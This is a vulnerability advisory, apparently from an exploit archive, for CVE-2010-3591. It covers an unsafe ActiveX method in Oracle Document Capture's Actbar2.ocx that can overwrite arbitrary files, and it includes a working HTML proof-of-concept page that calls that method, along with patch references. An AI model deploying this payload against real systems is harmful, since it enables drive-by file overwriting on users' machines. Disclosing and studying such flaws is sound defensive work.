Exploit for windows platform in category remote exploits
Application: Oracle Document Capture
Versions Affected: Release 10gR3
Vendor URL: www.oracle.com
Bugs: insecure method, File overwriting
Exploits: YES
Reported: 22.03.2010
Vendor response: 31.03.2010
Date of Public Advisory:24.01.2011
CVE-number: CVE-2010-3591
Author: Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
Description
***********
Oracle Document Capture contains ActiveX components that contains insecure methods.
Insecure method in Actbar2.ocx
Details
*******
Oracle Document Capture contains ActiveX component ActiveBar2Library (Actbar2.ocx) Lib GUID: {4932CEF1-2CAA-11D2-A165-0060081C43D9}
which is contains insecure method "SaveLayoutChanges" that can overwrite any unhidden file in system.
Class ActiveBar2
GUID: {4932CEF4-2CAA-11D2-A165-0060081C43D9}
Number of Interfaces: 1
Default Interface: IActiveBar2
RegKey Safe for Script: True
RegKey Safe for Init: True
KillBitSet: False
Exploit
*******
Attacker can construct html page which call vulnerable function "SaveLayoutChanges" from ActiveX component Actbar2.ocx
Example:
<HTML>
<HEAD>
<TITLE>DSecRG</TITLE>
</HEAD>
<BODY>
<OBJECT id='eds' classid='clsid:4932CEF4-2CAA-11D2-A165-0060081C43D9'></OBJECT>
<SCRIPT>
function Exploit(){
eds.SaveLayoutChanges("C:\\31337.txt",1);
}
Exploit();
</SCRIPT>
</BODY>
</HTML>
References
**********
http://dsecrg.com/pages/vul/show.php?id=304
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
Fix Information
*************
Information was published in CPU Jan 2011.
All customers can download CPU patches following instructions from:
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
# 0day.today [2018-03-01] #